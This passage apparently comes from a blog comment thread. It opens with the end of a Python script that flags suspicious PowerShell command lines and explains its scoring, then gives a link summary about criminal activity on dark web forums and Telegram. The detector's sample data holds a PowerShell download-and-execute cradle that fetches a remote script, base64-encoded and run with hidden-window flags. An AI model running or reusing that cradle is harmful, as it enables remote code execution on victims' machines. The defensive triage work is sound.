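SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe Get-Service -Name Spooler",
]

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(f"score={result['score']} {result['indicators']}")
        print("   ", result["cmdline"][:80])
        if result["decoded"]:
            print("    decoded:", result["decoded"])
```

The second event scores one point for `-ExecutionPolicy Bypass` alone, which is also how many legitimate scheduled tasks are launched; in a real pipeline the score is a sort key for an analyst, and the decoded payload is what you actually read. Script Block Logging (event 4104) catches the same content after PowerShell has unwrapped it, so it is the better source when it is enabled.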
Tomi Engdahl says:
Inside Threat Actors: Dark Web Forums vs. Illicit Telegram Communities https://www.bleepingcomputer.com/news/security/inside-threat-actors-dark-web-forums-vs-illicit-telegram-communities/
The proliferation of cybercrime on the internet has given rise to thousands of criminal communities. These corners of the internet, often dominated by malicious actors, allow them the space to coordinate and carry out their illegal activities successfully. Commonly, the area of the internet that experts advise has the highest criminal activity is on dark web forums and markets.
More recently, there has been a spike in illicit activities moving into online messaging applications like Telegram. Combined these two facets of cyberspace host a plethora of criminal activities carried out by threat actors.
In this post, we’re going to explore common threat actors and their activities on dark web forums versus illicit Telegram communities. Additionally, we’ll cover core similarities and key differences between each platform in order to better understand that not all cybercriminal based communities are created equally.